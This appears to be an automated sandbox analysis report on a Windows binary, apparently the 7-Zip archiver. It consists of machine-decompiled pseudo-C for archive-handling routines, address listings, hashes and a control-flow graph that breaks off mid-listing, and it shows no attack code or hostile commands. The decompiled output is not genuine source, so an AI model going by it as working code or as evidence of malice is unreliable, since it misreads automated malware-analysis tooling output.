																	 *((intOrPtr*)( *((intOrPtr*)(_t786 + 0xd0)) + 0x20)) =  *((intOrPtr*)( *((intOrPtr*)(_t786 + 0xd0)) + 0x20)) + _t714;
																	asm("adc [eax+0x24], edx");
																	_t553 =  *((intOrPtr*)(_t786 + 0xd0));
																	 *((intOrPtr*)(_t553 + 0x28)) =  *((intOrPtr*)(_t786 + 0xe8));
																	 *((intOrPtr*)(_t553 + 0x2c)) =  *((intOrPtr*)(_t786 + 0xec));
																	_t554 =  *((intOrPtr*)(_t791 + 0x20));
																	_push( *((intOrPtr*)(_t791 - 0x30)));
																	__eflags =  *(_t554 + 4);
																	if( *(_t554 + 4) != 0) {
																		L00407A18();
																		 *(_t791 - 4) = 5;
																		E00408604(_t791 - 0x48);
																		 *(_t791 - 4) = 4;
																		L00403411(_t791 - 0xd4);
																		L00407A18( *((intOrPtr*)(_t791 - 0x70)));
																		__eflags = _t786;
																		 *(_t791 - 4) = 0;
																		if(_t786 != 0) {
																			 *((intOrPtr*)( *_t786 + 8))(_t786);
																		}
																		_t790 = 0x80004005;
																		goto L110;
																	} else {
																		L00407A18();
																		goto L78;
																	}
																}
															} else {
																do {
																	_t563 =  *((intOrPtr*)( *((intOrPtr*)(_t791 - 0xc8)) +  *(_t791 + 0x24) * 4));
																	__eflags =  *(_t563 + 0x34);
																	if( *(_t563 + 0x34) == 0) {
																		goto L67;
																	} else {
																		_t724 =  *(_t791 + 0x1c);
																		_t565 =  *((intOrPtr*)( *_t724 + 0x1c))(_t724,  *((intOrPtr*)(_t563 + 0x30)));
																		__eflags = _t565;
																		 *(_t791 - 0x1c) = _t565;
																		if(_t565 != 0) {
																			L00407A18( *((intOrPtr*)(_t791 - 0x30)));
																			 *(_t791 - 4) = 5;
																			E00408604(_t791 - 0x48);
																			 *(_t791 - 4) = 4;
																			L00403411(_t791 - 0xd4);
																			L00407A18( *((intOrPtr*)(_t791 - 0x70)));
																			__eflags = _t786;
																			 *(_t791 - 4) = 0;
																			if(_t786 != 0) {
																				 *((intOrPtr*)( *_t786 + 8))(_t786);
																			}
																			_t790 =  *(_t791 - 0x1c);
																			goto L110;
																		} else {
																			goto L67;
																		}
																	}
																	goto L116;
																	L67:
																	_t539 =  *(_t791 - 0xcc);
																	 *(_t791 + 0x24) =  *(_t791 + 0x24) + 1;
																	__eflags =  *(_t791 + 0x24) - _t539;
																} while ( *(_t791 + 0x24) < _t539);
																goto L68;
															}
														} else {
															_t573 =  *((intOrPtr*)( *( *(_t791 + 0x1c)) + 0x34))(_t791 - 0x30);
															__eflags = _t573;
															 *(_t791 + 0x24) = _t573;
															if(_t573 != 0) {
																L00407A18( *((intOrPtr*)(_t791 - 0x30)));
																 *(_t791 - 4) = 5;
																E00408604(_t791 - 0x48);
																 *(_t791 - 4) = 4;
																L00403411(_t791 - 0xd4);
																L00407A18( *((intOrPtr*)(_t791 - 0x70)));
																__eflags = _t786;
																 *(_t791 - 4) = 0;
																if(_t786 != 0) {
																	 *((intOrPtr*)( *_t786 + 8))(_t786);
																}
																_t790 =  *(_t791 + 0x24);
																goto L110;
															} else {
																goto L64;
															}
														}
													}
												} else {
													 *(_t791 - 0x18) =  *(_t791 - 0x18) +  *((intOrPtr*)(_t791 - 0xac));
													_t581 =  *(_t791 + 0x1c);
													asm("adc [ebp-0x14], ecx");
													_t582 =  *((intOrPtr*)( *_t581 + 0xc))(_t581,  *(_t791 - 0x18),  *(_t791 - 0x14));
													__eflags = _t582;
													 *(_t791 + 0x24) = _t582;
													if(_t582 != 0) {
														 *(_t791 - 4) = 5;
														E00408604(_t791 - 0x48);
														 *(_t791 - 4) = 4;
														L00403411(_t791 - 0xd4);
														L00407A18( *((intOrPtr*)(_t791 - 0x70)));
														__eflags = _t786;
														 *(_t791 - 4) = 0;
														if(_t786 != 0) {
															 *((intOrPtr*)( *_t786 + 8))(_t786);
														}
														_t790 =  *(_t791 + 0x24);
														L110:
														 *(_t791 - 4) =  *(_t791 - 4) | 0xffffffff;
														E00408604(_t791 - 0xe8);
														_t468 = _t790;
														goto L82;
													} else {
														goto L61;
													}
												}
											}
										}
									}
								}
							}
							goto L116;
							L78:
							 *(_t791 - 4) = 5;
							E00408604(_t791 - 0x48);
							 *(_t791 - 4) = 4;
							L00403411(_t791 - 0xd4);
							 *(_t791 - 4) = 3;
							L00407A18( *((intOrPtr*)(_t791 - 0x70)));
							 *(_t791 - 0x20) =  *(_t791 - 0x20) + 1;
							__eflags =  *(_t791 - 0x20) -  *(_t791 - 0x24);
						} while ( *(_t791 - 0x20) <  *(_t791 - 0x24));
						goto L79;
					}
				} else {
					_t631 =  *(_t791 + 0x1c);
					_t632 =  *((intOrPtr*)( *_t631 + 0xc))(_t631,  *(_t791 - 0x18),  *(_t791 - 0x14));
					 *(_t791 + 0x24) = _t632;
					if(_t632 == 0) {
						goto L20;
					} else {
						 *(_t791 - 4) = 0;
						if(_t786 != 0) {
							 *((intOrPtr*)( *_t786 + 8))(_t786);
						}
						 *(_t791 - 4) =  *(_t791 - 4) | 0xffffffff;
						E00408604(_t791 - 0xe8);
						_t468 =  *(_t791 + 0x24);
						L82:
						 *[fs:0x0] =  *((intOrPtr*)(_t791 - 0xc));
						return _t468;
					}
				}
				L116:
			}



























































                                                                                  0x00415d31
                                                                                  0x00415d36
                                                                                  0x00415d44
                                                                                  0x00415d47
                                                                                  0x00415d4c
                                                                                  0x00415d4f
                                                                                  0x00415d52
                                                                                  0x00415d55
                                                                                  0x00415d58
                                                                                  0x00415d5b
                                                                                  0x00415d65
                                                                                  0x00415d68
                                                                                  0x00415d6b
                                                                                  0x00415d6e
                                                                                  0x00415d71
                                                                                  0x00415d74
                                                                                  0x00415d77
                                                                                  0x00415d7a
                                                                                  0x00415d7d
                                                                                  0x00415d82
                                                                                  0x00415d8f
                                                                                  0x00415d94
                                                                                  0x00415d9e
                                                                                  0x00415d96
                                                                                  0x00415d98
                                                                                  0x00415d98
                                                                                  0x00415da1
                                                                                  0x00415da5
                                                                                  0x00415da8
                                                                                  0x00415e28
                                                                                  0x00415e28
                                                                                  0x00415e2d
                                                                                  0x00415e33
                                                                                  0x00415e35
                                                                                  0x00415e3a
                                                                                  0x00415e3e
                                                                                  0x00000000
                                                                                  0x00415e40
                                                                                  0x00415e40
                                                                                  0x00415e45
                                                                                  0x00415e45
                                                                                  0x00415daa
                                                                                  0x00415daa
                                                                                  0x00415dad
                                                                                  0x00415db5
                                                                                  0x00415db9
                                                                                  0x00415dbf
                                                                                  0x00415dc5
                                                                                  0x00415dc7
                                                                                  0x00000000
                                                                                  0x00415dc9
                                                                                  0x00415dd8
                                                                                  0x00415de1
                                                                                  0x00415e52
                                                                                  0x00415e59
                                                                                  0x00415e5e
                                                                                  0x00415e67
                                                                                  0x00415e6e
                                                                                  0x00415e73
                                                                                  0x00415e73
                                                                                  0x00415e73
                                                                                  0x00415de3
                                                                                  0x00415deb
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00415deb
                                                                                  0x00415de1
                                                                                  0x00000000
                                                                                  0x00415ded
                                                                                  0x00415dff
                                                                                  0x00415e10
                                                                                  0x00415e16
                                                                                  0x00415e19
                                                                                  0x00415e1c
                                                                                  0x00415e21
                                                                                  0x00415e23
                                                                                  0x00000000
                                                                                  0x00415daa
                                                                                  0x00415e75
                                                                                  0x00415e77
                                                                                  0x00415e7a
                                                                                  0x00415e80
                                                                                  0x00415e85
                                                                                  0x00415e85
                                                                                  0x00415e8c
                                                                                  0x00415e8f
                                                                                  0x00415e99
                                                                                  0x00415e9c
                                                                                  0x00415ea2
                                                                                  0x00415ea8
                                                                                  0x00415eb0
                                                                                  0x00415eb6
                                                                                  0x00415eb9
                                                                                  0x00415ebc
                                                                                  0x00415ec2
                                                                                  0x00415ec8
                                                                                  0x00415ece
                                                                                  0x00415ed4
                                                                                  0x00415f10
                                                                                  0x00415f10
                                                                                  0x00415f13
                                                                                  0x00415f16
                                                                                  0x004163df
                                                                                  0x004163e5
                                                                                  0x004163e7
                                                                                  0x004163f0
                                                                                  0x004163f9
                                                                                  0x00416402
                                                                                  0x0041640b
                                                                                  0x00416414
                                                                                  0x0041641d
                                                                                  0x00416423
                                                                                  0x00416429
                                                                                  0x0041642a
                                                                                  0x0041642c
                                                                                  0x0041642f
                                                                                  0x00416438
                                                                                  0x0041643e
                                                                                  0x00416441
                                                                                  0x00416446
                                                                                  0x00416446
                                                                                  0x00416449
                                                                                  0x00416453
                                                                                  0x00416458
                                                                                  0x00416458
                                                                                  0x00000000
                                                                                  0x00415f1c
                                                                                  0x00415f1c
                                                                                  0x00415f2b
                                                                                  0x00415f2e
                                                                                  0x00415f36
                                                                                  0x00415f3a
                                                                                  0x00415f3c
                                                                                  0x00415f52
                                                                                  0x00415f58
                                                                                  0x00415f5a
                                                                                  0x00415f5f
                                                                                  0x00415f61
                                                                                  0x0041668a
                                                                                  0x00416693
                                                                                  0x0041669a
                                                                                  0x004166a4
                                                                                  0x004166a9
                                                                                  0x004166aa
                                                                                  0x004166ab
                                                                                  0x004166ac
                                                                                  0x004166ad
                                                                                  0x004166b1
                                                                                  0x004166b2
                                                                                  0x004166b5
                                                                                  0x004166bb
                                                                                  0x004166c2
                                                                                  0x004166c9
                                                                                  0x004166cc
                                                                                  0x004166cf
                                                                                  0x004166d2
                                                                                  0x004166d5
                                                                                  0x004166d8
                                                                                  0x004166dd
                                                                                  0x004166e1
                                                                                  0x004166e3
                                                                                  0x004166e6
                                                                                  0x004166e9
                                                                                  0x004166ee
                                                                                  0x004166f3
                                                                                  0x004166f7
                                                                                  0x004166f9
                                                                                  0x004166fc
                                                                                  0x004166ff
                                                                                  0x00416704
                                                                                  0x00416709
                                                                                  0x0041670d
                                                                                  0x0041670f
                                                                                  0x00416712
                                                                                  0x00416715
                                                                                  0x0041671a
                                                                                  0x0041671e
                                                                                  0x00416722
                                                                                  0x00416726
                                                                                  0x0041672c
                                                                                  0x00416732
                                                                                  0x00416738
                                                                                  0x0041673b
                                                                                  0x0041673e
                                                                                  0x00416741
                                                                                  0x00416748
                                                                                  0x0041674e
                                                                                  0x00416754
                                                                                  0x0041675a
                                                                                  0x0041675c
                                                                                  0x0041675e
                                                                                  0x00416762
                                                                                  0x00416768
                                                                                  0x0041676f
                                                                                  0x00416776
                                                                                  0x0041677c
                                                                                  0x0041677f
                                                                                  0x00416781
                                                                                  0x00416785
                                                                                  0x00416790
                                                                                  0x00416790
                                                                                  0x00416787
                                                                                  0x00416789
                                                                                  0x00416789
                                                                                  0x00416795
                                                                                  0x00416799
                                                                                  0x0041679f
                                                                                  0x004167ac
                                                                                  0x004167b4
                                                                                  0x00415f67
                                                                                  0x00415f6a
                                                                                  0x00415f6d
                                                                                  0x00415f6f
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00415f6f
                                                                                  0x00415f3e
                                                                                  0x00415f3e
                                                                                  0x00415f44
                                                                                  0x00415f4a
                                                                                  0x00415f75
                                                                                  0x00415f7a
                                                                                  0x00415f88
                                                                                  0x00415f8b
                                                                                  0x00415f8d
                                                                                  0x00415f90
                                                                                  0x0041646e
                                                                                  0x00416473
                                                                                  0x00416476
                                                                                  0x00416479
                                                                                  0x0041647e
                                                                                  0x0041647e
                                                                                  0x00416481
                                                                                  0x00000000
                                                                                  0x00415f96
                                                                                  0x00415f9c
                                                                                  0x00415fa6
                                                                                  0x00415faa
                                                                                  0x00415fb2
                                                                                  0x00415fb6
                                                                                  0x00415fbd
                                                                                  0x00415fc5
                                                                                  0x00415fc8
                                                                                  0x00415fcd
                                                                                  0x00415fd0
                                                                                  0x00415fd4
                                                                                  0x00415fd7
                                                                                  0x00415fdd
                                                                                  0x00415fe0
                                                                                  0x00415fe3
                                                                                  0x00415fe5
                                                                                  0x00415feb
                                                                                  0x00415fed
                                                                                  0x00415ff1
                                                                                  0x00415ff1
                                                                                  0x00415ff5
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00415ff7
                                                                                  0x00415ff9
                                                                                  0x00416008
                                                                                  0x00416008
                                                                                  0x00416008
                                                                                  0x00415ffb
                                                                                  0x00415ffc
                                                                                  0x00000000
                                                                                  0x00415ffc
                                                                                  0x0041600c
                                                                                  0x0041600c
                                                                                  0x0041600f
                                                                                  0x00416021
                                                                                  0x0041602d
                                                                                  0x00416031
                                                                                  0x00416036
                                                                                  0x00416038
                                                                                  0x0041603b
                                                                                  0x00416049
                                                                                  0x0041604e
                                                                                  0x00416050
                                                                                  0x00416063
                                                                                  0x0041606c
                                                                                  0x00416070
                                                                                  0x00416075
                                                                                  0x0041607f
                                                                                  0x00416084
                                                                                  0x00416088
                                                                                  0x0041608a
                                                                                  0x0041608c
                                                                                  0x0041608f
                                                                                  0x00416093
                                                                                  0x00416093
                                                                                  0x00416097
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00416099
                                                                                  0x0041609b
                                                                                  0x004160a7
                                                                                  0x004160a7
                                                                                  0x0041609d
                                                                                  0x0041609e
                                                                                  0x00000000
                                                                                  0x0041609e
                                                                                  0x004160aa
                                                                                  0x004160aa
                                                                                  0x004160ac
                                                                                  0x004160ba
                                                                                  0x004160c3
                                                                                  0x004160cc
                                                                                  0x004160cf
                                                                                  0x004160d9
                                                                                  0x004160de
                                                                                  0x004160e2
                                                                                  0x004160ec
                                                                                  0x004160f1
                                                                                  0x004160f3
                                                                                  0x004160fb
                                                                                  0x00416106
                                                                                  0x00416106
                                                                                  0x004160f3
                                                                                  0x004160e2
                                                                                  0x00000000
                                                                                  0x004160ac
                                                                                  0x004160a3
                                                                                  0x00000000
                                                                                  0x004160a3
                                                                                  0x0041608a
                                                                                  0x00416050
                                                                                  0x0041610b
                                                                                  0x0041610e
                                                                                  0x00416112
                                                                                  0x00416117
                                                                                  0x00000000
                                                                                  0x0041600f
                                                                                  0x00416003
                                                                                  0x00000000
                                                                                  0x00416003
                                                                                  0x00415fe5
                                                                                  0x00416118
                                                                                  0x00416118
                                                                                  0x00416124
                                                                                  0x00416129
                                                                                  0x0041612a
                                                                                  0x0041612e
                                                                                  0x0041612f
                                                                                  0x00416132
                                                                                  0x00416137
                                                                                  0x0041613c
                                                                                  0x0041613f
                                                                                  0x0041648c
                                                                                  0x00416490
                                                                                  0x0041649b
                                                                                  0x0041649f
                                                                                  0x004164a7
                                                                                  0x004164ac
                                                                                  0x004164af
                                                                                  0x004164b2
                                                                                  0x004164b7
                                                                                  0x004164b7
                                                                                  0x004164ba
                                                                                  0x00000000
                                                                                  0x00416145
                                                                                  0x00416150
                                                                                  0x0041615f
                                                                                  0x00416167
                                                                                  0x0041616a
                                                                                  0x0041616c
                                                                                  0x0041616f
                                                                                  0x004164c7
                                                                                  0x004164cb
                                                                                  0x004164d6
                                                                                  0x004164da
                                                                                  0x004164e2
                                                                                  0x004164e7
                                                                                  0x004164ea
                                                                                  0x004164ed
                                                                                  0x004164f2
                                                                                  0x004164f2
                                                                                  0x004164f5
                                                                                  0x00000000
                                                                                  0x00416175
                                                                                  0x00416175
                                                                                  0x00416178
                                                                                  0x00000000
                                                                                  0x0041617e
                                                                                  0x00416181
                                                                                  0x00416183
                                                                                  0x00416213
                                                                                  0x00416213
                                                                                  0x00416189
                                                                                  0x00416189
                                                                                  0x0041618f
                                                                                  0x00416192
                                                                                  0x00416198
                                                                                  0x004161a7
                                                                                  0x004161ac
                                                                                  0x004161ae
                                                                                  0x004161b1
                                                                                  0x004161b6
                                                                                  0x004161b9
                                                                                  0x004161c5
                                                                                  0x004161d2
                                                                                  0x004161e3
                                                                                  0x004161e3
                                                                                  0x004161e3
                                                                                  0x004161f4
                                                                                  0x004161f7
                                                                                  0x00416202
                                                                                  0x00416202
                                                                                  0x004161b9
                                                                                  0x00416205
                                                                                  0x0041620b
                                                                                  0x0041620b
                                                                                  0x00000000
                                                                                  0x00416198
                                                                                  0x00416192
                                                                                  0x00416219
                                                                                  0x00416247
                                                                                  0x0041624c
                                                                                  0x0041624f
                                                                                  0x00416252
                                                                                  0x00416255
                                                                                  0x00416261
                                                                                  0x00416267
                                                                                  0x0041626a
                                                                                  0x0041626c
                                                                                  0x0041626f
                                                                                  0x00416539
                                                                                  0x0041653f
                                                                                  0x00416546
                                                                                  0x00416551
                                                                                  0x00416555
                                                                                  0x0041655d
                                                                                  0x00416562
                                                                                  0x00416565
                                                                                  0x00416568
                                                                                  0x0041656d
                                                                                  0x0041656d
                                                                                  0x00416570
                                                                                  0x00000000
                                                                                  0x00416275
                                                                                  0x00416275
                                                                                  0x00416278
                                                                                  0x00416291
                                                                                  0x00416291
                                                                                  0x00416297
                                                                                  0x0041629a
                                                                                  0x0041629c
                                                                                  0x004162d5
                                                                                  0x004162db
                                                                                  0x004162e2
                                                                                  0x004162e5
                                                                                  0x004162e7
                                                                                  0x004162f3
                                                                                  0x004162f3
                                                                                  0x004162e9
                                                                                  0x004162e9
                                                                                  0x004162ec
                                                                                  0x00000000
                                                                                  0x004162ee
                                                                                  0x004162ee
                                                                                  0x004162f0
                                                                                  0x004162f0
                                                                                  0x004162ec
                                                                                  0x004162f5
                                                                                  0x004162fb
                                                                                  0x00416301
                                                                                  0x00416320
                                                                                  0x00416332
                                                                                  0x00416337
                                                                                  0x00416339
                                                                                  0x0041633c
                                                                                  0x004165fc
                                                                                  0x00416602
                                                                                  0x00416609
                                                                                  0x00416614
                                                                                  0x00416618
                                                                                  0x00416620
                                                                                  0x00416625
                                                                                  0x00416628
                                                                                  0x0041662b
                                                                                  0x00416630
                                                                                  0x00416630
                                                                                  0x00416633
                                                                                  0x00000000
                                                                                  0x00416342
                                                                                  0x00416345
                                                                                  0x00416347
                                                                                  0x00416369
                                                                                  0x0041636c
                                                                                  0x00416349
                                                                                  0x0041634f
                                                                                  0x00416355
                                                                                  0x0041635b
                                                                                  0x00416361
                                                                                  0x00416364
                                                                                  0x00416364
                                                                                  0x00416375
                                                                                  0x00416378
                                                                                  0x0041637b
                                                                                  0x00416387
                                                                                  0x00416390
                                                                                  0x00416393
                                                                                  0x00416396
                                                                                  0x00416399
                                                                                  0x0041639c
                                                                                  0x00416638
                                                                                  0x0041663e
                                                                                  0x00416645
                                                                                  0x00416650
                                                                                  0x00416654
                                                                                  0x0041665c
                                                                                  0x00416661
                                                                                  0x00416664
                                                                                  0x00416667
                                                                                  0x0041666c
                                                                                  0x0041666c
                                                                                  0x0041666f
                                                                                  0x00000000
                                                                                  0x004163a2
                                                                                  0x004163a2
                                                                                  0x00000000
                                                                                  0x004163a7
                                                                                  0x0041639c
                                                                                  0x0041629e
                                                                                  0x0041629e
                                                                                  0x004162a7
                                                                                  0x004162aa
                                                                                  0x004162ad
                                                                                  0x00000000
                                                                                  0x004162af
                                                                                  0x004162af
                                                                                  0x004162b9
                                                                                  0x004162bc
                                                                                  0x004162be
                                                                                  0x004162c1
                                                                                  0x004165bd
                                                                                  0x004165c3
                                                                                  0x004165ca
                                                                                  0x004165d5
                                                                                  0x004165d9
                                                                                  0x004165e1
                                                                                  0x004165e6
                                                                                  0x004165e9
                                                                                  0x004165ec
                                                                                  0x004165f1
                                                                                  0x004165f1
                                                                                  0x004165f4
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004162c1
                                                                                  0x00000000
                                                                                  0x004162c7
                                                                                  0x004162c7
                                                                                  0x004162cd
                                                                                  0x004162d0
                                                                                  0x004162d0
                                                                                  0x00000000
                                                                                  0x0041629e
                                                                                  0x0041627a
                                                                                  0x00416283
                                                                                  0x00416286
                                                                                  0x00416288
                                                                                  0x0041628b
                                                                                  0x0041657b
                                                                                  0x00416581
                                                                                  0x00416588
                                                                                  0x00416593
                                                                                  0x00416597
                                                                                  0x0041659f
                                                                                  0x004165a4
                                                                                  0x004165a7
                                                                                  0x004165aa
                                                                                  0x004165af
                                                                                  0x004165af
                                                                                  0x004165b2
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0041628b
                                                                                  0x00416278
                                                                                  0x0041621b
                                                                                  0x00416227
                                                                                  0x0041622a
                                                                                  0x0041622d
                                                                                  0x00416239
                                                                                  0x0041623c
                                                                                  0x0041623e
                                                                                  0x00416241
                                                                                  0x00416500
                                                                                  0x00416504
                                                                                  0x0041650f
                                                                                  0x00416513
                                                                                  0x0041651b
                                                                                  0x00416520
                                                                                  0x00416523
                                                                                  0x00416526
                                                                                  0x0041652b
                                                                                  0x0041652b
                                                                                  0x0041652e
                                                                                  0x00416674
                                                                                  0x00416674
                                                                                  0x0041667e
                                                                                  0x00416683
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00416241
                                                                                  0x00416219
                                                                                  0x00416178
                                                                                  0x0041616f
                                                                                  0x0041613f
                                                                                  0x00415f90
                                                                                  0x00000000
                                                                                  0x004163a8
                                                                                  0x004163ab
                                                                                  0x004163af
                                                                                  0x004163ba
                                                                                  0x004163be
                                                                                  0x004163c3
                                                                                  0x004163ca
                                                                                  0x004163cf
                                                                                  0x004163d6
                                                                                  0x004163d6
                                                                                  0x00000000
                                                                                  0x00415f1c
                                                                                  0x00415ed6
                                                                                  0x00415ed9
                                                                                  0x00415ee2
                                                                                  0x00415ee7
                                                                                  0x00415eea
                                                                                  0x00000000
                                                                                  0x00415eec
                                                                                  0x00415eee
                                                                                  0x00415ef1
                                                                                  0x00415ef6
                                                                                  0x00415ef6
                                                                                  0x00415ef9
                                                                                  0x00415f03
                                                                                  0x00415f08
                                                                                  0x0041645a
                                                                                  0x00416460
                                                                                  0x00416468
                                                                                  0x00416468
                                                                                  0x00415eea
                                                                                  0x00000000

                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00415D36
                                                                                    • Part of subcall function 0046B8F4: RaiseException.KERNEL32(0047CF70,?,00405CA1,?,?,?,0047CF70,?,?,?,00405CA1), ref: 0046B922
                                                                                    • Part of subcall function 00403411: __EH_prolog.LIBCMT ref: 00403416
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog$ExceptionRaise
                                                                                  • String ID: 001$rar
                                                                                  • API String ID: 2062786585-402399766
                                                                                  • Opcode ID: 6222c04c949ac495ab94f66733b2a8b9047b5a3fd200594ee6b5b932aa16b14e
                                                                                  • Instruction ID: 33800bdb08af1194ea128a8acb6c6cdf99de6f84a10513a4969611219b06b6dc
                                                                                  • Opcode Fuzzy Hash: 6222c04c949ac495ab94f66733b2a8b9047b5a3fd200594ee6b5b932aa16b14e
                                                                                  • Instruction Fuzzy Hash: B5623A70901259DFCB14DFA9C980ADDBBB1BF08308F1545AEE849B7291CB34AE85CF59
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0041035D Relevance: 5.8, APIs: 1, Strings: 2, Instructions: 546COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 2427 41035d-410378 __EH_prolog 2428 41037a call 40fff2 2427->2428 2429 41037f-410391 call 410a4c 2427->2429 2428->2429 2433 410393 call 40fff2 2429->2433 2434 410398-4103c0 call 4071f7 * 3 2429->2434 2433->2434 2442 4103c2-4103d2 call 4071f7 2434->2442 2443 4103d7-4103e3 call 4071f7 2434->2443 2442->2443 2448 4103e5-4103f9 call 4071f7 call 410a39 2443->2448 2449 4103fb 2443->2449 2451 410402-410435 call 41191e * 2 call 4071f7 2448->2451 2449->2451 2461 410437-410454 call 4071f7 call 410ca4 2451->2461 2462 410459-410465 call 4071f7 2451->2462 2461->2462 2468 410485-410494 call 4071f7 2462->2468 2469 410467-410480 call 4071f7 call 410ca4 2462->2469 2475 410496-41049c 2468->2475 2476 4104a9 2468->2476 2469->2468 2475->2476 2478 41049e-4104a1 2475->2478 2477 4104ad-4104ba call 40fe22 2476->2477 2482 4104c7-4104cf 2477->2482 2483 4104bc-4104c0 2477->2483 2478->2476 2479 4104a3-4104a7 2478->2479 2479->2477 2485 4104d1 2482->2485 2486 4104d5-4104d9 2482->2486 2483->2482 2484 4104c2-4104c5 2483->2484 2484->2486 2485->2486 2487 410502-41053a call 410b06 call 4071f7 * 2 2486->2487 2488 4104db-4104df 2486->2488 2502 410552-41056c call 4071f7 * 2 2487->2502 2503 41053c-41054d call 4071f7 call 401e26 2487->2503 2490 4104e1 call 40fff2 2488->2490 2491 4104e6-4104fb call 401e26 2488->2491 2490->2491 2491->2487 2497 4104fd call 40fff2 2491->2497 2497->2487 2511 410587-41058b 2502->2511 2512 41056e-410582 call 4071f7 call 401e26 2502->2512 2503->2502 2514 410591-410598 2511->2514 2515 41075b-410765 call 40fe46 2511->2515 2512->2511 2517 4105a5-4105aa call 40fffd 2514->2517 2518 41059a-4105a3 2514->2518 2524 41076b-410792 call 41124b call 4117bd call 4071f7 2515->2524 2525 4108ae-4108b4 2515->2525 2522 4105af-4105ce call 405b9f call 4071f7 2517->2522 2518->2517 2518->2522 2544 4105d0-4105e8 call 4071f7 call 410ca4 2522->2544 2545 4105ed-4105f9 call 4071f7 2522->2545 2562 410794 2524->2562 2563 41079b-4107b2 call 4071f7 2524->2563 2528 410a16-410a19 2525->2528 2529 4108ba-4108d7 2525->2529 2532 410a20-410a36 call 40925b 2528->2532 2533 410a1b call 40fff2 2528->2533 2534 4108f1-4108ff call 4071f7 2529->2534 2535 4108d9-4108ea call 4119b8 2529->2535 2533->2532 2534->2532 2553 410905-41092f call 4071f7 call 4039c0 call 407ed0 2534->2553 2535->2534 2549 4108ec call 40fff2 2535->2549 2544->2545 2560 410618-41061c 2545->2560 2561 4105fb-410613 call 4071f7 call 410ca4 2545->2561 2549->2534 2588 410931 call 40fff2 2553->2588 2589 410936-410940 2553->2589 2568 41062d-410641 call 411046 call 40925b 2560->2568 2569 41061e-410628 call 410ac9 2560->2569 2561->2560 2562->2563 2578 4107d2-4107e5 call 4071f7 2563->2578 2579 4107b4-4107b9 2563->2579 2593 410643-410682 call 4071f7 call 4039c0 call 406796 * 2 call 407a18 2568->2593 2594 410684-41068e call 41003e 2568->2594 2569->2568 2595 4107e7-410808 call 4071f7 call 401e26 2578->2595 2596 41082c-410844 2578->2596 2583 4107c5-4107c9 2579->2583 2584 4107bb-4107bf 2579->2584 2583->2578 2585 4107cb 2583->2585 2584->2585 2590 4107c1-4107c3 2584->2590 2585->2578 2588->2589 2591 410942-41094a 2589->2591 2592 41097e-410982 2589->2592 2590->2578 2590->2583 2598 41094c-41094e 2591->2598 2599 41094f-41095c call 4119b8 2591->2599 2602 4109b1 call 40fff2 2592->2602 2603 410984-410989 2592->2603 2607 410693-410697 2593->2607 2594->2607 2595->2596 2652 41080a-410814 2595->2652 2604 410884-410886 2596->2604 2605 410846-41084d 2596->2605 2598->2599 2639 410963-410967 2599->2639 2640 41095e call 40fff2 2599->2640 2622 4109b6 2602->2622 2614 4109d9-4109dd 2603->2614 2615 41098b-410993 2603->2615 2611 4108a1-4108a9 call 411046 2604->2611 2612 410888-41089c call 4071f7 call 401e26 2604->2612 2616 410864-410866 2605->2616 2617 41084f-41085f call 46b8f4 2605->2617 2618 410734-410756 call 40862d call 408604 2607->2618 2619 41069d-4106ab call 4117bd 2607->2619 2611->2532 2612->2611 2614->2602 2627 4109df-4109e4 2614->2627 2628 410995-410997 2615->2628 2629 410998-4109a0 2615->2629 2616->2604 2620 410868-41086c 2616->2620 2617->2616 2618->2532 2661 4106ad-4106b1 2619->2661 2662 4106cf-4106db call 4071f7 2619->2662 2620->2604 2638 41086e-41087f call 46b8f4 2620->2638 2632 4109b9-4109d1 call 407a18 call 4071f7 2622->2632 2627->2602 2636 4109e6-4109eb 2627->2636 2628->2629 2631 4109a2-4109af call 4119b8 2629->2631 2629->2632 2631->2602 2631->2622 2632->2553 2678 4109d7 2632->2678 2636->2632 2654 4109ed-410a14 call 4072c9 call 401e26 call 407a18 2636->2654 2638->2604 2649 410969 call 40fff2 2639->2649 2650 41096e-41097c 2639->2650 2640->2639 2649->2650 2650->2622 2652->2596 2658 410816-410827 call 4075a5 2652->2658 2654->2622 2658->2596 2661->2662 2665 4106b3-4106b7 2661->2665 2679 4106fd-41070d call 4071f7 2662->2679 2680 4106dd-4106f8 call 4071f7 call 401e26 call 40beb9 2662->2680 2665->2662 2674 4106b9-4106ca call 46b8f4 2665->2674 2674->2662 2678->2532 2689 410727-41072b 2679->2689 2690 41070f-410725 call 4071f7 2679->2690 